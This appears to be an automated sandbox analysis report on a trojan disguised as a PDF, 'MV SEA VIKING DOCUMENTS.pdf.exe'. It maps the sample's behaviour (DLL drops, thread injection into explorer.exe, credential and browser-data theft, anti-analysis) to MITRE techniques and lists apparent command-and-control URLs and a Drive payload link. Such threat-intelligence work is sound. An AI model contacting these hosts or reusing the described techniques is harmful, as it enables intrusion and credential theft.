      Source: Yara matchFile source: 00000015.00000002.7208839040.0000000005030000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts1
      Native API      		1
      DLL Side-Loading      		1
      DLL Side-Loading      		1
      Deobfuscate/Decode Files or Information      		1
      OS Credential Dumping      		2
      File and Directory Discovery      		Remote Services1
      Archive Collected Data      		Exfiltration Over Other Network Medium3
      Ingress Tool Transfer      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
      System Shutdown/Reboot
      Default Accounts1
      Shared Modules      		1
      Registry Run Keys / Startup Folder      		1
      Access Token Manipulation      		12
      Obfuscated Files or Information      		LSASS Memory6
      System Information Discovery      		Remote Desktop Protocol1
      Data from Local System      		Exfiltration Over Bluetooth11
      Encrypted Channel      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain Accounts1
      Exploitation for Client Execution      		Logon Script (Windows)712
      Process Injection      		1
      Software Packing      		Security Account Manager1
      Query Registry      		SMB/Windows Admin Shares1
      Email Collection      		Automated Exfiltration4
      Non-Application Layer Protocol      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)1
      Registry Run Keys / Startup Folder      		1
      Timestomp      		NTDS421
      Security Software Discovery      		Distributed Component Object Model1
      Clipboard Data      		Scheduled Transfer25
      Application Layer Protocol      		SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
      DLL Side-Loading      		LSA Secrets22
      Virtualization/Sandbox Evasion      		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.common1
      File Deletion      		Cached Domain Credentials2
      Process Discovery      		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup Items1
      Masquerading      		DCSync1
      Application Window Discovery      		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job22
      Virtualization/Sandbox Evasion      		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
      Access Token Manipulation      		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)712
      Process Injection      		Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 575819 Sample: MV SEA VIKING DOCUMENTS.pdf.exe Startdate: 21/02/2022 Architecture: WINDOWS Score: 100 59 www.vaughnediting.com 2->59 61 www.piqqekqqbpjpajbzvvfqapwr.store 2->61 63 49 other IPs or domains 2->63 89 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->89 91 Found malware configuration 2->91 93 Malicious sample detected (through community Yara rule) 2->93 97 11 other signatures 2->97 11 MV SEA VIKING DOCUMENTS.pdf.exe 22 2->11         started        signatures3 95 Tries to resolve many domain names, but no domain seems valid 61->95 process4 file5 49 C:\Users\user\AppData\Local\Temp\usp10.dll, PE32 11->49 dropped 51 C:\Users\user\AppData\...\raschapext.dll, PE32 11->51 dropped 53 C:\Users\user\AppData\...\provmigrate.dll, PE32 11->53 dropped 55 2 other files (none is malicious) 11->55 dropped 115 Tries to detect Any.run 11->115 117 Hides threads from debuggers 11->117 15 MV SEA VIKING DOCUMENTS.pdf.exe 6 11->15         started        signatures6 process7 dnsIp8 71 googlehosted.l.googleusercontent.com 142.250.185.161, 443, 49757, 49808 GOOGLEUS United States 15->71 73 drive.google.com 142.250.185.174, 443, 49756, 49807 GOOGLEUS United States 15->73 75 Modifies the context of a thread in another process (thread injection) 15->75 77 Tries to detect Any.run 15->77 79 Maps a DLL or memory area into another process 15->79 81 3 other signatures 15->81 19 explorer.exe 4 6 15->19 injected signatures9 process10 dnsIp11 65 www.rsxrsh.com 45.195.115.71, 49791, 49814, 49815 VPSQUANUS Seychelles 19->65 67 www.dreamintelligent.com 185.190.39.52, 49788, 49809, 49810 SILVERCOMRU-ASRU Bulgaria 19->67 69 19 other IPs or domains 19->69 47 C:\Users\user\AppData\...\shmhprg0nvltzt.exe, PE32 19->47 dropped 99 System process connects to network (likely due to code injection or exploit) 19->99 101 Benign windows process drops PE files 19->101 24 chkdsk.exe 19->24         started        27 shmhprg0nvltzt.exe 19->27         started        30 shmhprg0nvltzt.exe 19->30         started        32 shmhprg0nvltzt.exe 19->32         started        file12 signatures13 process14 file15 103 Tries to steal Mail credentials (via file / registry access) 24->103 105 Self deletion via cmd delete 24->105 107 Tries to harvest and steal browser information (history, passwords, etc) 24->107 113 4 other signatures 24->113 34 cmd.exe 24->34         started        37 cmd.exe 24->37         started        39 firefox.exe 24->39         started        57 C:\Users\user\AppData\Local\...\System.dll, PE32 27->57 dropped 109 Tries to detect Any.run 27->109 111 Hides threads from debuggers 27->111 41 shmhprg0nvltzt.exe 27->41         started        signatures16 process17 signatures18 83 Tries to harvest and steal browser information (history, passwords, etc) 34->83 43 conhost.exe 34->43         started        45 conhost.exe 37->45         started        85 Tries to detect Any.run 41->85 87 Hides threads from debuggers 41->87 process19

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      MV SEA VIKING DOCUMENTS.pdf.exe6%VirustotalBrowse
      MV SEA VIKING DOCUMENTS.pdf.exe14%ReversingLabsWin32.Trojan.Shelsy

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\E6l40hhe\shmhprg0nvltzt.exe14%ReversingLabsWin32.Trojan.Shelsy
      C:\Users\user\AppData\Local\Temp\cliconfg.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\nslEFEC.tmp\System.dll0%MetadefenderBrowse
      C:\Users\user\AppData\Local\Temp\nslEFEC.tmp\System.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp\System.dll0%MetadefenderBrowse
      C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp\System.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\provmigrate.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\raschapext.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\usp10.dll0%MetadefenderBrowse
      C:\Users\user\AppData\Local\Temp\usp10.dll0%ReversingLabs

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      33.0.firefox.exe.2234796c.0.unpack100%AviraTR/Patched.Ren.GenDownload File
      21.2.chkdsk.exe.594796c.3.unpack100%AviraTR/Patched.Ren.GenDownload File
      33.0.firefox.exe.2234796c.1.unpack100%AviraTR/Patched.Ren.GenDownload File
      33.2.firefox.exe.2234796c.0.unpack100%AviraTR/Patched.Ren.GenDownload File

      Domains

      SourceDetectionScannerLabelLink
      vaughnediting.com4%VirustotalBrowse
      www.nagradi7.com0%VirustotalBrowse

      URLs

      SourceDetectionScannerLabelLink
      https://powerpoint.office.comer0%Avira URL Cloudsafe
      http://www.easypeasy.community/be4o/?h48Hl=qw7hUB7wiBY63PZfQs3gDL1/RbwQ/gEcLPIEvk4CQbmdP+9FY8/qx5kKOZH67IcfD5ki&7nx8=7nN0Wh-H70%Avira URL Cloudsafe
      http://www.waktuk.com/be4o/100%Avira URL Cloudmalware
      http://www.quanqiu55555.com/be4o/?h48Hl=yMGLhnyeH19jbN+jTVkumEksJ3u99HITZ4h1J3SKUgKf5+hZ4WRN7xEsij25EKwk4NjG&w6=ZbFDmL0%Avira URL Cloudsafe
      https://excel.office.comt0%Avira URL Cloudsafe
      http://www.rsxrsh.com/be4o/100%Avira URL Cloudmalware
      http://www.7bkj.com/be4o/?h48Hl=2H0l+vSkOseleOGxaYuOAM6EcVRszlgpd1g39MbiOsu7jwlookSoZaEGSOy4tzpz9QV3&GXqXh=YZ_XN00%Avira URL Cloudsafe
      http://www.itservon.com/be4o/?h48Hl=a9faHC2D7Dm/r4BU9fdxzX5Q1U3tWnFtWGXmSrkj2WSz2Xwsoc22xGDcB1dwRLNeK4a1&w6=ZbFDmL0%Avira URL Cloudsafe
      http://www.vendasdigitaisonline.com/be4o/?h48Hl=7cKzimu7mUkgDRyMKljMoWyo6u+mjltrVmMX1NSvq0diecWuw4+QXmAspWvQrjbM5ify&w6=ZbFDmL0%Avira URL Cloudsafe
      http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.0%Avira URL Cloudsafe
      http://www.neonewway.club/be4o/?h48Hl=zyUBHNqGnW7VnxSitCDb9MggHqAMtGNnwmK4vVI2BlMgKT8HiANJi7OUdKuilZWbd1L3&GXqXh=YZ_XN00%Avira URL Cloudsafe
      http://www.mariachinuevozacatecas24-7.com/be4o/?h48Hl=u3IzMx5ToVDuGGVnzGoQ7VGXCLeqa3ksCgRWKaNdgo4W3sFmKuQ6Eu5/95yvzyZg0zqi&GXqXh=YZ_XN00%Avira URL Cloudsafe
      http://www.dreamintelligent.com/be4o/?h48Hl=3gaGgvCHlfs+sPey4wEISFn1QJRwzcaNyq85jGUXFNKJ+AEleqZoXJJYcNbcoOST9cbz&GXqXh=YZ_XN00%Avira URL Cloudsafe
      http://www.dreamintelligent.com/be4o/0%Avira URL Cloudsafe
      http://www.brainymortgage.info/be4o/?h48Hl=hsW7O5325DRqN8YWXiUPXnAvYseB+yx3cLX7/2SBrZaiZrW5cMIJApIhTGhmYfsvRNMR&iVP=6lL026g0%Avira URL Cloudsafe
      http://www.ooo-club.com0%Avira URL Cloudsafe
      http://www.antoniopasciuti.com/be4o/?h48Hl=hkcde7P37oUuH8w5ioFv7OuFbHOx9d6tBZcdZbqEWA6Yt+e+JSjrlFDcUKkYXgm22imD&GXqXh=YZ_XN00%Avira URL Cloudsafe
      http://www.noireimpactcollective.net/be4o/?h48Hl=vWcq0X33Y2hBfiL/bHeP0RWtqtuntvM4ehZwLUMPr58K+hEeg2YqRGCwATn/AzHlKLs2&GXqXh=YZ_XN0100%Avira URL Cloudmalware
      http://schemas.micro0%Avira URL Cloudsafe
      http://www.gopher.ftp://ftp.0%Avira URL Cloudsafe
      http://www.quanqiu55555.com/be4o/0%Avira URL Cloudsafe
      http://www.waktuk.com/be4o/?7nx8=7nN0Wh-H7&h48Hl=ZACv9IykpsLcwv8F8kwPwUzl7gpv2Xu+P+MOxVxbXGrtU1PWc37Ho1yUPVVacpXBvcfu100%Avira URL Cloudmalware
      http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd0%Avira URL Cloudsafe
      https://www.vaughnediting.com/be4o/?Olnhrn=ongdD4qXjjPP&h48Hl=o5nWsVahRRcZ5g7lskYZzD6T98nAnbLK/jyfa2100%Avira URL Cloudmalware
      http://www.easypeasy.community/be4o/0%Avira URL Cloudsafe
      www.istemnetwork.com/be4o/100%Avira URL Cloudmalware
      http://www.mariachinuevozacatecas24-7.com/be4o/?h48Hl=u3IzMx5ToVDuGGVnzGoQ7VGXCLeqa3ksCgRWKaNdgo4W3sFmKuQ6Eu5/95yvzyZg0zqi&7nx8=7nN0Wh-H70%Avira URL Cloudsafe
      https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-2140%Avira URL Cloudsafe
      https://outlook.comeHost_0%Avira URL Cloudsafe
      http://www.josiemaran-supernatural.com/be4o/100%Avira URL Cloudmalware
      http://www.buresdx.com/be4o/100%Avira URL Cloudmalware
      http://www.ooo-club.com/be4o/?h48Hl=QNRjHLgdDThc6A5oSB9Rp7ktW95Q4+1l/IbqwB8DOvHda+yG2lJr6+bTEkZVhYbPGXKX&GXqXh=YZ_XN00%Avira URL Cloudsafe
      http://www.josiemaran-supernatural.com/be4o/?h48Hl=do8Jf58SEKGGCNGHZbpskk9a9mhTmrx8G+lp6qHzh6DMjzgDqGs60o4ehjqHyuaS4N4w&GXqXh=YZ_XN0100%Avira URL Cloudmalware
      http://www.ooo-club.com/be4o/0%Avira URL Cloudsafe
      http://www.noireimpactcollective.net/be4o/100%Avira URL Cloudmalware
      http://www.vendasdigitaisonline.com/be4o/0%Avira URL Cloudsafe
      http://www.rsxrsh.com/be4o/?h48Hl=Tpp8LERQoafeDPvT4B0Z2/EHkXBIuz7bjHlQVU8N2p3tpS82PcmIpc4MoLsyxaBwDc0d&GXqXh=YZ_XN0100%Avira URL Cloudmalware
      http://www.kaikkistore.com/be4o/?h48Hl=jq9b4c7BaMhD9kdTAddwzOt+LNN1qoIISHwx1xbT8oPDlt6nx7w14q7WGmdhUJs/cSrW&iVP=6lL026g0%Avira URL Cloudsafe
      http://www.4huav946.com/be4o/?h48Hl=iu9SHmJYjlqHSITYxUYF5zd8ZPof8OreVpr1w+DDUlIuWCBWIgIZulFzL5qHxGUDcYYs&w6=ZbFDmL0%Avira URL Cloudsafe
      http://www.janhenningsen.com/be4o/?h48Hl=MXCJfAiixaQW23gb43srtNqd5bs2JuRcGlYNxDXnDFPSUKLWpR3/CyWyuFSDkL8/v7KL&iVP=6lL026g0%Avira URL Cloudsafe
      http://www.mariachinuevozacatecas24-7.com/be4o/0%Avira URL Cloudsafe
      http://www.nagradi7.com/be4o/0%Avira URL Cloudsafe
      https://excel.office.comK0%Avira URL Cloudsafe
      http://www.quanqiu55555.com/be4o/?h48Hl=yMGLhnyeH19jbN+jTVkumEksJ3u99HITZ4h1J3SKUgKf5+hZ4WRN7xEsij25EKwk4NjG&GXqXh=YZ_XN00%Avira URL Cloudsafe
      http://181ue.com/sq.html?entry=0%Avira URL Cloudsafe
      http://www.ooo-club.com/be4o/?h48Hl=QNRjHLgdDThc6A5oSB9Rp7ktW95Q4+1l/IbqwB8DOvHda+yG2lJr6+bTEkZVhYbPGXKX&iVP=6lL026g0%Avira URL Cloudsafe
      https://word.office.comewe0%Avira URL Cloudsafe
      http://www.waktuk.com/be4o/?h48Hl=ZACv9IykpsLcwv8F8kwPwUzl7gpv2Xu+P+MOxVxbXGrtU1PWc37Ho1yUPVVacpXBvcfu&GXqXh=YZ_XN0100%Avira URL Cloudmalware
      http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd0%Avira URL Cloudsafe
      http://www.nagradi7.com/be4o/?h48Hl=kw7dGhb5eKkyCVvAuZmYTQsgnBkQwasXlJHrp3Yi63/vNGhbWFnPnmRrKjdxIJy9M/yz&7nx8=7nN0Wh-H70%Avira URL Cloudsafe
      http://www.fairytalepageants.com/be4o/?h48Hl=i0+Fnnt4E2duUPt43OZuwY3vuaej64lfKZi0K7F4B5AoqOaU2cNQP6t/zkb03XoiZyP6&w6=ZbFDmL0%Avira URL Cloudsafe
      http://www.josiemaran-supernatural.com/be4o/?h48Hl=do8Jf58SEKGGCNGHZbpskk9a9mhTmrx8G+lp6qHzh6DMjzgDqGs60o4ehjqHyuaS4N4w&w6=ZbFDmL100%Avira URL Cloudmalware
      http://www.buresdx.com/be4o/?h48Hl=CBV85lUl5iGXXllmWETcgzTRYTuU0jkLI/xLLa4RVPF6HDjlZoPpCKC/374THXhEpvSN&GXqXh=YZ_XN0100%Avira URL Cloudmalware

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      vendasdigitaisonline.com
      		213.190.6.63
      		truetrue
        		unknown
        sslhosting.simplesite.com
        		54.154.44.39
        		truefalse
          		high
          vaughnediting.com
          		192.0.78.25
          		truetrueunknown
          www.nagradi7.com
          		154.214.67.115
          		truetrueunknown
          www.4huav946.com
          		35.244.144.199
          		truefalse
            		unknown
            josiemaran-supernatural.com
            		34.102.136.180
            		truefalse
              		unknown
              shops.myshopify.com
              		23.227.38.74
              		truetrue
                		unknown
                noireimpactcollective.net
                		34.102.136.180
                		truefalse
                  		unknown
                  drive.google.com
                  		142.250.185.174
                  		truefalse
                    		high
                    www.janhenningsen.com
                    		217.160.0.98
                    		truetrue
                      		unknown
                      itservon.com
                      		162.0.209.21
                      		truetrue
                        		unknown
                        www.quanqiu55555.com
                        		38.143.0.82
                        		truetrue
                          		unknown
                          www.rsxrsh.com
                          		45.195.115.71
                          		truetrue
                            		unknown
                            parking.namesilo.com
                            		64.32.22.102
                            		truefalse
                              		high
                              avid3814506.altervista.org
                              		148.251.15.228
                              		truefalse
                                		high
                                fairytalepageants.com
                                		34.102.136.180
                                		truefalse
                                  		unknown
                                  www.buresdx.com
                                  		66.29.154.157
                                  		truetrue
                                    		unknown
                                    www.ooo-club.com
                                    		35.214.4.70
                                    		truetrue
                                      		unknown
                                      easypeasy.community
                                      		91.184.31.217
                                      		truetrue
                                        		unknown
                                        www.dreamintelligent.com
                                        		185.190.39.52
                                        		truetrue
                                          		unknown
                                          neonewway.club
                                          		79.110.48.188
                                          		truetrue
                                            		unknown
                                            7bkj.com
                                            		154.23.172.38
                                            		truetrue
                                              		unknown
                                              googlehosted.l.googleusercontent.com
                                              		142.250.185.161
                                              		truefalse
                                                		high
                                                ghs.googlehosted.com
                                                		142.250.186.51
                                                		truefalse
                                                  		unknown
                                                  waktuk.com
                                                  		95.179.246.125
                                                  		truetrue
                                                    		unknown
                                                    www.waktuk.com
                                                    		unknown
                                                    		unknowntrue
                                                      		unknown
                                                      www.personas1web.com
                                                      		unknown
                                                      		unknowntrue
                                                        		unknown
                                                        www.fairytalepageants.com
                                                        		unknown
                                                        		unknowntrue
                                                          		unknown
                                                          www.piqqekqqbpjpajbzvvfqapwr.store
                                                          		unknown
                                                          		unknowntrue
                                                            		unknown
                                                            www.logotzo.com
                                                            		unknown
                                                            		unknowntrue
                                                              		unknown
                                                              www.owensigns.com
                                                              		unknown
                                                              		unknowntrue
                                                                		unknown
                                                                www.istemnetwork.com
                                                                		unknown
                                                                		unknowntrue
                                                                  		unknown
                                                                  www.mariachinuevozacatecas24-7.com
                                                                  		unknown
                                                                  		unknowntrue
                                                                    		unknown
                                                                    www.eaglesaviationexperience.com
                                                                    		unknown
                                                                    		unknowntrue
                                                                      		unknown
                                                                      doc-04-08-docs.googleusercontent.com
                                                                      		unknown
                                                                      		unknownfalse
                                                                        		high
                                                                        www.noireimpactcollective.net
                                                                        		unknown
                                                                        		unknowntrue
                                                                          		unknown
                                                                          www.percentrostered.net
                                                                          		unknown
                                                                          		unknowntrue
                                                                            		unknown
                                                                            www.josiemaran-supernatural.com
                                                                            		unknown
                                                                            		unknowntrue
                                                                              		unknown
                                                                              www.justbe-event.com
                                                                              		unknown
                                                                              		unknowntrue
                                                                                		unknown
                                                                                www.brainymortgage.info
                                                                                		unknown
                                                                                		unknowntrue
                                                                                  		unknown
                                                                                  www.icarus-groupe.com
                                                                                  		unknown
                                                                                  		unknowntrue
                                                                                    		unknown
                                                                                    www.kuanghong.club
                                                                                    		unknown
                                                                                    		unknowntrue
                                                                                      		unknown
                                                                                      www.7bkj.com
                                                                                      		unknown
                                                                                      		unknowntrue
                                                                                        		unknown
                                                                                        www.kaikkistore.com
                                                                                        		unknown
                                                                                        		unknowntrue
                                                                                          		unknown
                                                                                          www.antoniopasciuti.com
                                                                                          		unknown
                                                                                          		unknowntrue
                                                                                            		unknown
                                                                                            www.itservon.com
                                                                                            		unknown
                                                                                            		unknowntrue
                                                                                              		unknown
                                                                                              www.vendasdigitaisonline.com
                                                                                              		unknown
                                                                                              		unknowntrue
                                                                                                		unknown
                                                                                                www.neonewway.club
                                                                                                		unknown
                                                                                                		unknowntrue
                                                                                                  		unknown
                                                                                                  www.easypeasy.community
                                                                                                  		unknown
                                                                                                  		unknowntrue
                                                                                                    		unknown
                                                                                                    www.vaughnediting.com
                                                                                                    		unknown
                                                                                                    		unknowntrue
                                                                                                      		unknown
                                                                                                      www.marvinhull.com
                                                                                                      		unknown
                                                                                                      		unknowntrue
                                                                                                        		unknown

                                                                                                        Contacted URLs

                                                                                                        NameMaliciousAntivirus DetectionReputation
                                                                                                        http://www.easypeasy.community/be4o/?h48Hl=qw7hUB7wiBY63PZfQs3gDL1/RbwQ/gEcLPIEvk4CQbmdP+9FY8/qx5kKOZH67IcfD5ki&7nx8=7nN0Wh-H7true
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        http://www.waktuk.com/be4o/true
                                                                                                        • Avira URL Cloud: malware
                                                                                                        		unknown
                                                                                                        http://www.quanqiu55555.com/be4o/?h48Hl=yMGLhnyeH19jbN+jTVkumEksJ3u99HITZ4h1J3SKUgKf5+hZ4WRN7xEsij25EKwk4NjG&w6=ZbFDmLtrue
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        http://www.rsxrsh.com/be4o/true
                                                                                                        • Avira URL Cloud: malware
                                                                                                        		unknown
                                                                                                        http://www.7bkj.com/be4o/?h48Hl=2H0l+vSkOseleOGxaYuOAM6EcVRszlgpd1g39MbiOsu7jwlookSoZaEGSOy4tzpz9QV3&GXqXh=YZ_XN0true
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        http://www.itservon.com/be4o/?h48Hl=a9faHC2D7Dm/r4BU9fdxzX5Q1U3tWnFtWGXmSrkj2WSz2Xwsoc22xGDcB1dwRLNeK4a1&w6=ZbFDmLtrue
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        http://www.vendasdigitaisonline.com/be4o/?h48Hl=7cKzimu7mUkgDRyMKljMoWyo6u+mjltrVmMX1NSvq0diecWuw4+QXmAspWvQrjbM5ify&w6=ZbFDmLtrue
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        http://www.neonewway.club/be4o/?h48Hl=zyUBHNqGnW7VnxSitCDb9MggHqAMtGNnwmK4vVI2BlMgKT8HiANJi7OUdKuilZWbd1L3&GXqXh=YZ_XN0true
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        http://www.mariachinuevozacatecas24-7.com/be4o/?h48Hl=u3IzMx5ToVDuGGVnzGoQ7VGXCLeqa3ksCgRWKaNdgo4W3sFmKuQ6Eu5/95yvzyZg0zqi&GXqXh=YZ_XN0true
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        http://www.dreamintelligent.com/be4o/?h48Hl=3gaGgvCHlfs+sPey4wEISFn1QJRwzcaNyq85jGUXFNKJ+AEleqZoXJJYcNbcoOST9cbz&GXqXh=YZ_XN0true
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        http://www.dreamintelligent.com/be4o/true
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        http://www.brainymortgage.info/be4o/?h48Hl=hsW7O5325DRqN8YWXiUPXnAvYseB+yx3cLX7/2SBrZaiZrW5cMIJApIhTGhmYfsvRNMR&iVP=6lL026gtrue
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        http://www.antoniopasciuti.com/be4o/?h48Hl=hkcde7P37oUuH8w5ioFv7OuFbHOx9d6tBZcdZbqEWA6Yt+e+JSjrlFDcUKkYXgm22imD&GXqXh=YZ_XN0true
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        http://www.noireimpactcollective.net/be4o/?h48Hl=vWcq0X33Y2hBfiL/bHeP0RWtqtuntvM4ehZwLUMPr58K+hEeg2YqRGCwATn/AzHlKLs2&GXqXh=YZ_XN0false
                                                                                                        • Avira URL Cloud: malware
                                                                                                        		unknown
                                                                                                        http://www.quanqiu55555.com/be4o/true
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        http://www.waktuk.com/be4o/?7nx8=7nN0Wh-H7&h48Hl=ZACv9IykpsLcwv8F8kwPwUzl7gpv2Xu+P+MOxVxbXGrtU1PWc37Ho1yUPVVacpXBvcfutrue
                                                                                                        • Avira URL Cloud: malware
                                                                                                        		unknown
                                                                                                        http://www.easypeasy.community/be4o/true
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        www.istemnetwork.com/be4o/true
                                                                                                        • Avira URL Cloud: malware
                                                                                                        		low
                                                                                                        http://www.mariachinuevozacatecas24-7.com/be4o/?h48Hl=u3IzMx5ToVDuGGVnzGoQ7VGXCLeqa3ksCgRWKaNdgo4W3sFmKuQ6Eu5/95yvzyZg0zqi&7nx8=7nN0Wh-H7true
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        http://www.josiemaran-supernatural.com/be4o/false
                                                                                                        • Avira URL Cloud: malware
                                                                                                        		unknown
                                                                                                        http://www.buresdx.com/be4o/true
                                                                                                        • Avira URL Cloud: malware
                                                                                                        		unknown
                                                                                                        http://www.ooo-club.com/be4o/?h48Hl=QNRjHLgdDThc6A5oSB9Rp7ktW95Q4+1l/IbqwB8DOvHda+yG2lJr6+bTEkZVhYbPGXKX&GXqXh=YZ_XN0true
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        http://www.josiemaran-supernatural.com/be4o/?h48Hl=do8Jf58SEKGGCNGHZbpskk9a9mhTmrx8G+lp6qHzh6DMjzgDqGs60o4ehjqHyuaS4N4w&GXqXh=YZ_XN0false
                                                                                                        • Avira URL Cloud: malware
                                                                                                        		unknown
                                                                                                        http://www.ooo-club.com/be4o/true
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        http://www.noireimpactcollective.net/be4o/false
                                                                                                        • Avira URL Cloud: malware
                                                                                                        		unknown
                                                                                                        http://www.vendasdigitaisonline.com/be4o/true
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        http://www.rsxrsh.com/be4o/?h48Hl=Tpp8LERQoafeDPvT4B0Z2/EHkXBIuz7bjHlQVU8N2p3tpS82PcmIpc4MoLsyxaBwDc0d&GXqXh=YZ_XN0true
                                                                                                        • Avira URL Cloud: malware
                                                                                                        		unknown
                                                                                                        http://www.kaikkistore.com/be4o/?h48Hl=jq9b4c7BaMhD9kdTAddwzOt+LNN1qoIISHwx1xbT8oPDlt6nx7w14q7WGmdhUJs/cSrW&iVP=6lL026gtrue
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        http://www.4huav946.com/be4o/?h48Hl=iu9SHmJYjlqHSITYxUYF5zd8ZPof8OreVpr1w+DDUlIuWCBWIgIZulFzL5qHxGUDcYYs&w6=ZbFDmLfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        http://www.janhenningsen.com/be4o/?h48Hl=MXCJfAiixaQW23gb43srtNqd5bs2JuRcGlYNxDXnDFPSUKLWpR3/CyWyuFSDkL8/v7KL&iVP=6lL026gtrue
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        https://doc-04-08-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/v3j65rcqup1mp604v6fhecb8kek8r9nu/1645458600000/01502421811266965908/*/1_L7ZipgVNc4_sHw57wljySn0gUbSqwED?e=downloadfalse
                                                                                                          		high
                                                                                                          https://doc-04-08-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/bvob9bt0aenrms2uk1g1u44qsq7kk1jh/1645458825000/01502421811266965908/*/1_L7ZipgVNc4_sHw57wljySn0gUbSqwED?e=downloadfalse
                                                                                                            		high
                                                                                                            http://www.mariachinuevozacatecas24-7.com/be4o/true
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            http://www.nagradi7.com/be4o/true
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            http://www.quanqiu55555.com/be4o/?h48Hl=yMGLhnyeH19jbN+jTVkumEksJ3u99HITZ4h1J3SKUgKf5+hZ4WRN7xEsij25EKwk4NjG&GXqXh=YZ_XN0true
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            http://www.ooo-club.com/be4o/?h48Hl=QNRjHLgdDThc6A5oSB9Rp7ktW95Q4+1l/IbqwB8DOvHda+yG2lJr6+bTEkZVhYbPGXKX&iVP=6lL026gtrue
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            http://www.waktuk.com/be4o/?h48Hl=ZACv9IykpsLcwv8F8kwPwUzl7gpv2Xu+P+MOxVxbXGrtU1PWc37Ho1yUPVVacpXBvcfu&GXqXh=YZ_XN0true
                                                                                                            • Avira URL Cloud: malware
                                                                                                            		unknown
